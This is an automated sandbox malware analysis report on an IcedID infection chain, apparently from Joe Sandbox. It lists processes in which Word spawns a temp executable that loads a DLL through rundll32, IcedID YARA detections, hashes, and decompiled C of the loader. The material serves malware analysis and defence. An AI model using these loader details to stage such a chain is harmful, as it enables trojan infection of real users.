                                            Data Ascii: 10c<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at alexbionka.com Port 80</address></body></html>0



                                            Target ID:1
                                            Start time:17:38:18
                                            Start date:11/08/2022
                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                            Imagebase:0x13f440000
                                            File size:1423704 bytes
                                            MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Target ID:4
                                            Start time:17:38:28
                                            Start date:11/08/2022
                                            Path:C:\Users\user\AppData\Local\Temp\r9093.tmp.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\Temp\r9093.tmp.exe" "C:\Users\user\AppData\Local\Temp\y875E.tmp.dll",#1
                                            Imagebase:0x760000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 0%, Metadefender, Browse
                                            • Detection: 0%, ReversingLabs
                                            Reputation:high

                                            Target ID:5
                                            Start time:17:38:29
                                            Start date:11/08/2022
                                            Path:C:\Windows\System32\rundll32.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\AppData\Local\Temp\r9093.tmp.exe" "C:\Users\user\AppData\Local\Temp\y875E.tmp.dll",#1
                                            Imagebase:0xffe40000
                                            File size:45568 bytes
                                            MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: Windows_Trojan_IcedID_0b62e783, Description: unknown, Source: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_IcedID_91562d18, Description: unknown, Source: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_IcedID_48029e37, Description: unknown, Source: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_IcedID_11d24d35, Description: unknown, Source: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_IcedID_6, Description: Yara detected IcedID, Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_IcedID_11d24d35, Description: unknown, Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_IcedID_0b62e783, Description: unknown, Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_IcedID_91562d18, Description: unknown, Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_IcedID_48029e37, Description: unknown, Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                            Reputation:high

                                              Execution Graph

                                              Execution Coverage:20.8%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:16.3%
                                              Total number of Nodes:312
                                              Total number of Limit Nodes:7

                                              Control-flow Graph

                                              C-Code - Quality: 94%
                                              			E00761203(char _a4, WCHAR* _a12, intOrPtr _a16) {
                                              				int _v8;
                                              				int _v12;
                                              				char _v16;
                                              				void* _v20;
                                              				void _v24;
                                              				signed int _v28;
                                              				char _v32;
                                              				char _v36;
                                              				intOrPtr _v40;
                                              				void* _t46;
                                              				void* _t51;
                                              				intOrPtr _t64;
                                              				void* _t65;
                                              				void* _t69;
                                              				void* _t72;
                                              				void* _t73;
                                              				struct HWND__* _t77;
                                              
                                              				_t71 = 1;
                                              				__imp__HeapSetInformation(0, 1, 0, 0);
                                              				_v24 = 1;
                                              				NtSetInformationProcess(0xffffffff, 0x22,  &_v24, 4); // executed
                                              				_t76 = lstrlenW(_a12) + 1;
                                              				 *0x76504c = _a4;
                                              				_t46 = LocalAlloc(0x40, lstrlenW(_a12) + 1 + _t76);
                                              				_v20 = _t46;
                                              				if(_t46 == 0) {
                                              					L13:
                                              					ExitProcess(0);
                                              				}
                                              				if(E00761AE1(_t46, _t76, _a12) >= 0 && E00761622(_t76, _v20,  &_v28,  &_a4,  &_v32,  &_a12) != 0) {
                                              					_t81 = _v28 & 1;
                                              					if((_v28 & 1) != 0) {
                                              						E00763955(_a4, _a12);
                                              					} else {
                                              						SetErrorMode(0x8001); // executed
                                              						_v16 = 0;
                                              						_t64 = E00761E56(_t72, _a4,  &_v16, 1); // executed
                                              						_v40 = _t64;
                                              						_t65 = E007619E3(_t72, _t81, _t64); // executed
                                              						_t82 = _t65;
                                              						if(_t65 == 0) {
                                              							_t51 = E0076389E(_t73,  *0x76504c, 0x403, _a4, L"requestedRunLevel");
                                              						} else {
                                              							_v12 = 0;
                                              							_v8 = 0;
                                              							_t69 = E00761B87(_t73, _t82,  *0x76504c, _a4, _v32, _a12,  &_v8,  &_v36,  &_v12); // executed
                                              							_t71 = _v12;
                                              							if(_t69 != 0) {
                                              								if(_t71 != 0) {
                                              									_a12 = _t71;
                                              								}
                                              								E00761467(_t72, _v8);
                                              								_t77 = E007613B9( *0x76504c, L"RunDLL");
                                              								E00761444(_v36, _t77,  *0x76504c, _a12, _a16);
                                              								if(_t77 != 0) {
                                              									DestroyWindow(_t77);
                                              								}
                                              								FreeLibrary(_v8);
                                              							}
                                              							_t51 = LocalFree(_t71);
                                              						}
                                              						E0076138B(_t51, _v40, _v16);
                                              					}
                                              				}
                                              				LocalFree(_v20);
                                              				goto L13;
                                              			}

                                              APIs
                                              • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,00765068,00000001,00000000), ref: 00761217
                                              • NtSetInformationProcess.NTDLL ref: 0076122A
                                              • lstrlenW.KERNEL32(?), ref: 00761233
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 0076124A
                                              • SetErrorMode.KERNELBASE(00008001,?,?,?,?,?,00000000,00000001,?), ref: 0076129B
                                                • Part of subcall function 00761E56: GetFileAttributesW.KERNELBASE(?,00000000,00000001,00000001), ref: 00761E7F
                                                • Part of subcall function 00761E56: lstrlenW.KERNEL32(?), ref: 00761ECA
                                                • Part of subcall function 00761E56: GetFileAttributesW.KERNELBASE(?,?,00000104,.manifest), ref: 00761EF5
                                                • Part of subcall function 00761E56: CreateActCtxW.KERNEL32(00000020), ref: 00761F31
                                                • Part of subcall function 00761E56: CreateActCtxW.KERNEL32(00000020), ref: 00761F4F
                                                • Part of subcall function 00761E56: CreateActCtxW.KERNEL32(00000020), ref: 00761F69
                                                • Part of subcall function 00761E56: GetModuleHandleW.KERNEL32(00000000), ref: 00761FA3
                                                • Part of subcall function 00761E56: CreateActCtxW.KERNEL32(00000000), ref: 00761FC0
                                                • Part of subcall function 00761E56: ActivateActCtx.KERNEL32(00000000,?), ref: 00761FCD
                                              • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,00000000,?,?,00000001), ref: 0076133B
                                                • Part of subcall function 00761467: RtlImageNtHeader.NTDLL(?), ref: 0076147A
                                                • Part of subcall function 00761467: ImageDirectoryEntryToData.IMAGEHLP(?,00000001,0000000A,00000001,?,?,007612FF,00000001,?,?,?,00000001,?,?,00000000,?), ref: 0076149C
                                                • Part of subcall function 007613B9: LoadIconW.USER32 ref: 007613E3
                                                • Part of subcall function 007613B9: LoadCursorW.USER32 ref: 007613F2
                                                • Part of subcall function 007613B9: RegisterClassW.USER32 ref: 00761413
                                                • Part of subcall function 007613B9: CreateWindowExW.USER32 ref: 00761432
                                              • DestroyWindow.USER32 ref: 0076132B
                                              • FreeLibrary.KERNEL32(00000001,?,00000000,?,?,RunDLL,00000001,?,?,?,00000001,?,?,00000000,?,?), ref: 00761334
                                              • LocalFree.KERNEL32(?,00000000,00000001,?), ref: 0076134F
                                              • ExitProcess.KERNEL32 ref: 00761356
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: Create$FreeLocal$AttributesFileImageInformationLoadProcessWindowlstrlen$ActivateAllocClassCursorDataDestroyDirectoryEntryErrorExitHandleHeaderHeapIconLibraryModeModuleRegister
                                              • String ID: RunDLL$requestedRunLevel
                                              • API String ID: 1179100334-3494409908
                                              • Opcode ID: 07ee11f4a62d8b76216e87614070d1642ca3ff462be22a60166b284798f18aba
                                              • Instruction ID: c88bd9664e5f1ba4b21aaf27dd8f7e04664c89f8e64fc7b8dc12e84262dd9b52
                                              • Opcode Fuzzy Hash: 07ee11f4a62d8b76216e87614070d1642ca3ff462be22a60166b284798f18aba
                                              • Instruction Fuzzy Hash: E3410875900249FBCF129FA1DC4DDEE7FB9FB08340F588025FE13A1161DA798A54ABA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              APIs
                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000008,00000000,00000000,00000001), ref: 007614E7
                                              • RtlImageNtHeader.NTDLL(00000000), ref: 007614FC
                                              • SetProcessDEPPolicy.KERNEL32(00000003), ref: 00761513
                                              • GetLastError.KERNEL32 ref: 007623FC
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: ErrorHeaderImageLastLibraryLoadPolicyProcess
                                              • String ID:
                                              • API String ID: 1237969533-0
                                              • Opcode ID: 63efabbb05e666f301ada55a39c2804eba5857458432c83dfef62b94ebfef692
                                              • Instruction ID: b597f4b6b1ef62a2f729155ed7e4dd83f893ee2fe0e31b53a502b9ba082d95f3
                                              • Opcode Fuzzy Hash: 63efabbb05e666f301ada55a39c2804eba5857458432c83dfef62b94ebfef692
                                              • Instruction Fuzzy Hash: 6521A47164025CBFEB119B60CC8DEEA7B6CEB44344F944465FA07E3181DAB89E888B60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 209 7619e3-761a00 call 761a33 212 761a27-761a2b 209->212 213 761a02-761a06 209->213 213->212 214 761a08-761a1a call 7620b4 213->214 217 761a20-761a21 214->217 218 762108-76211b NtOpenProcessToken 214->218 217->212 220 762383-762385 217->220 218->212 219 762121-762142 NtSetInformationToken NtClose 218->219 219->212 220->212
                                              C-Code - Quality: 36%
                                              			E007619E3(void* __ecx, void* __eflags, void* _a4) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t16;
                                              				signed int _t21;
                                              				void** _t22;
                                              				void* _t28;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_v12 = _v12 & 0x00000000;
                                              				_v8 = _v8 & 0x00000000;
                                              				_t16 = E00761A33(__ecx,  &_v8); // executed
                                              				_t28 = _t16;
                                              				if(_t28 != 0 && _v8 == 0) {
                                              					E007620B4(_a4,  &_v12);
                                              					_t21 = _v12;
                                              					if(_t21 == 0) {
                                              						_t22 =  &_a4;
                                              						__imp__NtOpenProcessToken(0xffffffff, 0x80, _t22);
                                              						if(_t22 >= 0) {
                                              							_v12 = 1;
                                              							__imp__NtSetInformationToken(_a4, 0x18,  &_v12, 4);
                                              							NtClose(_a4);
                                              						}
                                              					} else {
                                              						if(_t21 != 1) {
                                              							_t28 = 0;
                                              						}
                                              					}
                                              				}
                                              				return _t28;
                                              			}
                                              0x007619e8
                                              0x007619e9
                                              0x007619ea
                                              0x007619ee
                                              0x007619f7
                                              0x007619fc
                                              0x00761a00
                                              0x00761a0f
                                              0x00761a17
                                              0x00761a1a
                                              0x00762108
                                              0x00762113
                                              0x0076211b
                                              0x0076212c
                                              0x00762133
                                              0x0076213c
                                              0x0076213c
                                              0x00761a20
                                              0x00761a21
                                              0x00762383
                                              0x00762383
                                              0x00761a21
                                              0x00761a1a
                                              0x00761a2b

                                              APIs
                                                • Part of subcall function 00761A33: NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 00761A4B
                                                • Part of subcall function 00761A33: NtClose.NTDLL ref: 00761A6E
                                                • Part of subcall function 007620B4: QueryActCtxW.KERNEL32(80000000,000000FF,00000000,00000005,?,0000000C,00000000), ref: 007620E4
                                              • NtOpenProcessToken.NTDLL(000000FF,00000080,00000000), ref: 00762113
                                              • NtSetInformationToken.NTDLL ref: 00762133
                                              • NtClose.NTDLL ref: 0076213C
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
• Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: Token$CloseOpenProcess$InformationQuery
                                              • String ID:
                                              • API String ID: 1146784981-0
                                              • Opcode ID: b8b41b697ba9f80b6a20cd8dc0cd13e1cd6c06f3a8a2cc8e113e9a36565ff153
                                              • Instruction ID: 57405b6a82c364fa153ae5341a5f1f2d6f109626959876fa347efe85002461ed
                                              • Opcode Fuzzy Hash: b8b41b697ba9f80b6a20cd8dc0cd13e1cd6c06f3a8a2cc8e113e9a36565ff153
                                              • Instruction Fuzzy Hash: B2019E7250060CFBDB108BD4CC0DBED7AB8EB52351F988154FA02E6190DBB98B45C790
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 221 761a8c-761ac0 NtQueryInformationToken 222 761ad5-761ad9 221->222 223 761ac2-761ac6 221->223 224 7621e3-7621e8 223->224 225 761acc-761acf 223->225 224->222 225->222 226 762362-762378 NtQueryInformationToken 225->226 227 76237e 226->227 228 7621ed-7621f1 226->228 227->222 228->224 229 7621f3 228->229 229->222
                                              APIs
                                              • NtQueryInformationToken.NTDLL ref: 00761ABC
                                              • NtQueryInformationToken.NTDLL ref: 00762374
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
• Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: InformationQueryToken
                                              • String ID:
                                              • API String ID: 4239771691-0
                                              • Opcode ID: 4e3167e1ff924f52f2ae3604de67e87a657326a9a03735b30a871902b9c3e7e3
                                              • Instruction ID: 7e26a5f33503d8a6d6d1bcb436725f7059f0330afa67dd784242bfc273507f95
                                              • Opcode Fuzzy Hash: 4e3167e1ff924f52f2ae3604de67e87a657326a9a03735b30a871902b9c3e7e3
                                              • Instruction Fuzzy Hash: B411177290161CFBDB11CF85CC44FEAB7BCEB49760F548056FA1296151D3749A02DBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 230 761a33-761a53 NtOpenProcessToken 231 761a55-761a64 call 761a8c 230->231 232 761a7f-761a84 230->232 234 761a69-761a77 NtClose 231->234 234->232 235 761a79-761a7e 234->235 235->232
                                              C-Code - Quality: 58%
                                              			E00761A33(void* __ecx, void* _a4) {
                                              				char _v8;
                                              				char _v12;
                                              				void** _t9;
                                              				void* _t13;
                                              				void* _t20;
                                              				char _t21;
                                              				void* _t23;
                                              				intOrPtr* _t24;
                                              
                                              				_t24 = _a4;
                                              				_t9 =  &_a4;
                                              				_t21 = 0;
                                              				 *_t24 = 0;
                                              				__imp__NtOpenProcessToken(0xffffffff, 8, _t9, _t20, _t23, __ecx, __ecx);
                                              				if(_t9 >= 0) {
                                              					_v8 = 0;
                                              					_t13 = E00761A8C(__ecx, _a4,  &_v8,  &_v12); // executed
                                              					NtClose(_a4);
                                              					if(_t13 >= 0) {
                                              						 *_t24 = _v8;
                                              						_t21 = 1;
                                              					}
                                              				}
                                              				return _t21;
                                              			}
                                              0x00761a3b
                                              0x00761a3f
                                              0x00761a45
                                              0x00761a49
                                              0x00761a4b
                                              0x00761a53
                                              0x00761a61
                                              0x00761a64
                                              0x00761a6e
                                              0x00761a77
                                              0x00761a7c
                                              0x00761a7e
                                              0x00761a7e
                                              0x00761a77
                                              0x00761a84

                                              APIs
                                              • NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 00761A4B
                                                • Part of subcall function 00761A8C: NtQueryInformationToken.NTDLL ref: 00761ABC
                                              • NtClose.NTDLL ref: 00761A6E
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
• Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: Token$CloseInformationOpenProcessQuery
                                              • String ID:
                                              • API String ID: 65470678-0
                                              • Opcode ID: 57ce463f166c8a5781ab6dc87fbd3e83d52984dbd4efaa0d6bbd9e0eed98812b
                                              • Instruction ID: 4c73ce320ad246dda22e2488d26e337015ec3ba2340836cc2e6eb1ba87e60b3d
                                              • Opcode Fuzzy Hash: 57ce463f166c8a5781ab6dc87fbd3e83d52984dbd4efaa0d6bbd9e0eed98812b
                                              • Instruction Fuzzy Hash: 02F0627A600208BBDB009F95CC48DDF7BADEB95350B148129FE52D3250D6749B409B60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              C-Code - Quality: 38%
                                              			E00761E56(void* __ecx, WCHAR* _a4, intOrPtr* _a8, intOrPtr _a12) {
                                              				signed int _v8;
                                              				short _v528;
                                              				intOrPtr* _v532;
                                              				intOrPtr _v544;
                                              				WCHAR* _v556;
                                              				signed int _v560;
                                              				signed int _v564;
                                              				WCHAR* _v568;
                                              				struct HINSTANCE__* _v572;
                                              				signed int _v580;
                                              				char _v596;
                                              				signed int _v600;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				intOrPtr* _t41;
                                              				long _t42;
                                              				WCHAR* _t46;
                                              				void* _t49;
                                              				signed int _t51;
                                              				signed int _t54;
                                              				signed int _t56;
                                              				signed int _t58;
                                              				WCHAR* _t60;
                                              				void* _t63;
                                              				long _t65;
                                              				signed int _t70;
                                              				signed int _t74;
                                              				signed int _t76;
                                              				WCHAR* _t77;
                                              				void* _t78;
                                              				long _t79;
                                              				signed int _t80;
                                              
                                              				_v8 =  *0x765040 ^ _t80;
                                              				_t41 = _a8;
                                              				_t77 = _a4;
                                              				_t70 = 0;
                                              				_v532 = _t41;
                                              				 *_t41 = 0; // executed
                                              				_t42 = GetFileAttributesW(_t77); // executed
                                              				_t79 = 0x104;
                                              				if(_t42 == 0xffffffff) {
                                              					if(SearchPathW(0, _t77, 0, 0x104,  &_v528,  &_v568) != 0) {
                                              						L2:
                                              						_v560 = _v560 & 0x00000000;
                                              						_t46 =  &_v528;
                                              						_t70 = _t70 | 0xffffffff;
                                              						_v564 = 0x20;
                                              						_v556 = _t46;
                                              						_t77 = lstrlenW(_t46);
                                              						_t49 = E00762001( &_v528, _t79, L".manifest");
                                              						_t79 = __imp__CreateActCtxW;
                                              						if(_t49 >= 0) {
                                              							_t65 = GetFileAttributesW( &_v528); // executed
                                              							if(_t65 != _t70) {
                                              								_t70 =  *_t79( &_v564);
                                              							}
                                              						}
                                              						 *((short*)(_t80 + _t77 * 2 - 0x20c)) = 0;
                                              						if(_t70 != 0xffffffff) {
                                              							L14:
                                              							_push(_v532);
                                              							_push(_t70);
                                              							goto L11;
                                              						} else {
                                              							_v560 = 8;
                                              							_v544 = 0x7b;
                                              							_t54 =  *_t79( &_v564); // executed
                                              							_t70 = _t54;
                                              							if(_t70 != 0xffffffff) {
                                              								goto L14;
                                              							}
                                              							_v544 = 0x7c;
                                              							_t56 =  *_t79( &_v564); // executed
                                              							_t70 = _t56;
                                              							if(_t70 != 0xffffffff) {
                                              								L12:
                                              								_t51 = _t70;
                                              								L13:
                                              								return E00761189(_t51, _t70, _v8 ^ _t80, _t76, _t77, _t79);
                                              							}
                                              							_v544 = 2;
                                              							_t58 =  *_t79( &_v564); // executed
                                              							_t70 = _t58;
                                              							if(_t70 != 0xffffffff) {
                                              								goto L14;
                                              							}
                                              							if(_a12 == 0) {
                                              								goto L12;
                                              							}
                                              							_v600 = _v600 & 0x00000000;
                                              							_t76 = 7;
                                              							_t74 = _t76;
                                              							_t78 =  &_v596;
                                              							_t60 = memset(_t78, 0, _t74 << 2);
                                              							_t77 = _t78 + _t74;
                                              							_v596 = 0x88;
                                              							_v580 = _t76;
                                              							_v572 = GetModuleHandleW(_t60);
                                              							_v600 = 0x20;
                                              							_t63 =  *_t79( &_v600);
                                              							if(_t63 == _t70) {
                                              								goto L12;
                                              							}
                                              							_push(_v532);
                                              							_push(_t63);
                                              							L11:
                                              							__imp__ActivateActCtx();
                                              							goto L12;
                                              						}
                                              					}
                                              					L16:
                                              					_t51 = 0;
                                              					goto L13;
                                              				}
                                              				if(E00761AE1( &_v528, 0x104, _t77) < 0) {
                                              					goto L16;
                                              				}
                                              				goto L2;
                                              			}
                                              0x00761e68
                                              0x00761e6b
                                              0x00761e71
                                              0x00761e74
                                              0x00761e77
                                              0x00761e7d
                                              0x00761e7f
                                              0x00761e85
                                              0x00761e8d
                                              0x00762355
                                              0x00761ea9
                                              0x00761ea9
                                              0x00761eb0
                                              0x00761eb7
                                              0x00761eba
                                              0x00761ec4
                                              0x00761ed5
                                              0x00761edf
                                              0x00761ee4
                                              0x00761eec
                                              0x00761ef5
                                              0x00761efd
                                              0x00762621
                                              0x00762621
                                              0x00761efd
                                              0x00761f05
                                              0x00761f10
                                              0x007620fc
                                              0x007620fc
                                              0x00762102
                                              0x00000000
                                              0x00761f16
                                              0x00761f1d
                                              0x00761f27
                                              0x00761f31
                                              0x00761f33
                                              0x00761f38
                                              0x00000000
                                              0x00000000
                                              0x00761f45
                                              0x00761f4f
                                              0x00761f51
                                              0x00761f56
                                              0x00761fd3
                                              0x00761fd3
                                              0x00761fd5
                                              0x00761fe3
                                              0x00761fe3
                                              0x00761f5f
                                              0x00761f69
                                              0x00761f6b
                                              0x00761f70
                                              0x00000000
                                              0x00000000
                                              0x00761f7a
                                              0x00000000
                                              0x00000000
                                              0x00761f7c
                                              0x00761f85
                                              0x00761f88
                                              0x00761f8a
                                              0x00761f90
                                              0x00761f90
                                              0x00761f93
                                              0x00761f9d
                                              0x00761fa9
                                              0x00761fb6
                                              0x00761fc0
                                              0x00761fc4
                                              0x00000000
                                              0x00000000
                                              0x00761fc6
                                              0x00761fcc
                                              0x00761fcd
                                              0x00761fcd
                                              0x00000000
                                              0x00761fcd
                                              0x00761f10
                                              0x0076235b
                                              0x0076235b
                                              0x00000000
                                              0x0076235b
                                              0x00761ea3
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,00000000,00000001,00000001), ref: 00761E7F
                                              • lstrlenW.KERNEL32(?), ref: 00761ECA
                                              • GetFileAttributesW.KERNELBASE(?,?,00000104,.manifest), ref: 00761EF5
                                              • CreateActCtxW.KERNEL32(00000020), ref: 00761F31
                                              • CreateActCtxW.KERNEL32(00000020), ref: 00761F4F
                                              • CreateActCtxW.KERNEL32(00000020), ref: 00761F69
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00761FA3
                                              • CreateActCtxW.KERNEL32(00000000), ref: 00761FC0
                                              • ActivateActCtx.KERNEL32(00000000,?), ref: 00761FCD
                                              • SearchPathW.KERNEL32 ref: 0076234D
                                              • CreateActCtxW.KERNEL32(00000020), ref: 0076261F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
• Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: Create$AttributesFile$ActivateHandleModulePathSearchlstrlen
                                              • String ID: $ $.manifest$P4Uu0TUu$|
                                              • API String ID: 833452776-189316523
                                              • Opcode ID: 4b1a8ba44820131c68a0fdbdf46d4b4c8b53556b237a60676b06e3a5147c6ba6
                                              • Instruction ID: 559ee61de89b112b7e8eb7522cc35408620dcdef79524c9f1530b06254d7b708
                                              • Opcode Fuzzy Hash: 4b1a8ba44820131c68a0fdbdf46d4b4c8b53556b237a60676b06e3a5147c6ba6
                                              • Instruction Fuzzy Hash: 264193B1901218ABCB20DFB4DC8CBDEB7FCAB48324F5446A5E91AD3191D7789A85CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              C-Code - Quality: 44%
                                              			E007639D0(intOrPtr __eax, signed int __ebx, char __edx, void* __eflags) {
                                              				intOrPtr _v0;
                                              				signed int _v4;
                                              				signed int _v12;
                                              				short _v528;
                                              				struct _SECURITY_ATTRIBUTES* _v532;
                                              				struct _PROCESS_INFORMATION _v548;
                                              				struct _STARTUPINFOW _v616;
                                              				void* __edi;
                                              				void* __esi;
                                              				intOrPtr _t26;
                                              				void* _t27;
                                              				void* _t29;
                                              				void* _t30;
                                              				void* _t35;
                                              				void* _t36;
                                              				int _t48;
                                              				long _t50;
                                              				void* _t57;
                                              				signed int _t60;
                                              				void* _t64;
                                              				void* _t69;
                                              				void* _t70;
                                              				intOrPtr* _t71;
                                              				signed int _t73;
                                              				signed int _t75;
                                              
                                              				_t62 = __edx;
                                              				_t56 = __ebx;
                                              				_t26 = __eax;
                                              				asm("loopne 0xffffffbf");
                                              				asm("in al, 0xfc");
                                              				_push(0x8e4b804b);
                                              				asm("pushfd");
                                              				if(__eflags != 0) {
                                              					 *(__edx + 0x73) =  *(__edx + 0x73) ^ __ebx;
                                              					 *((char*)(__eax - 0x6f6f6f70)) = __edx;
                                              					_push(_t73);
                                              					_t73 = _t75;
                                              					_t75 = _t75 - 0x268;
                                              					_v12 =  *0x765040 ^ _t73;
                                              					_t26 = _v0;
                                              					_push(__ebx);
                                              					_t56 = 0;
                                              				}
                                              				_v532 = _t56;
                                              				_t27 = E007629B3(_t26); // executed
                                              				_t69 = _t27;
                                              				_t29 = GetCurrentProcess();
                                              				__imp__IsWow64Process(_t29,  &_v532);
                                              				if(_t29 == 0 || _v532 == _t56) {
                                              					L14:
                                              					_t30 = 0;
                                              					__eflags = 0;
                                              				} else {
                                              					_t60 = 8;
                                              					_v616.dwXCountChars = _t56;
                                              					memset( &(_v616.dwYCountChars), 0, _t60 << 2);
                                              					__imp__GetNativeSystemInfo( &(_v616.dwXCountChars)); // executed
                                              					_t35 = 9;
                                              					if(_t35 != _v616.dwXCountChars || _t69 == 0x8664) {
                                              						_t36 = 6;
                                              						if(_t36 != _v616.dwXCountChars || _t69 == 0x200) {
                                              							if(GetSystemDirectoryW( &_v528, 0xf6) == 0 || E0076384E( &_v528, 0x105, L"rundll32.exe", _t56) < 0) {
                                              								goto L14;
                                              							} else {
                                              								_t71 = __imp__Wow64EnableWow64FsRedirection;
                                              								 *_t71(_t56);
                                              								memset( &(_v616.lpReserved), _t56, 0x40);
                                              								_v616.cb = 0x44;
                                              								_t48 = CreateProcessW( &_v528, GetCommandLineW(), _t56, _t56, _t56, _t56, _t56, _t56,  &_v616,  &_v548); // executed
                                              								if(_t48 == 0) {
                                              									goto L14;
                                              								} else {
                                              									 *_t71(1);
                                              									_t50 = WaitForSingleObject(_v548.hProcess, 0xffffffff);
                                              									CloseHandle(_v548);
                                              									CloseHandle(_v548.hThread);
                                              									if(_t50 != _t56) {
                                              										goto L14;
                                              									} else {
                                              										_t30 = 1;
                                              									}
                                              								}
                                              							}
                                              						} else {
                                              							goto L14;
                                              						}
                                              					} else {
                                              						goto L14;
                                              					}
                                              				}
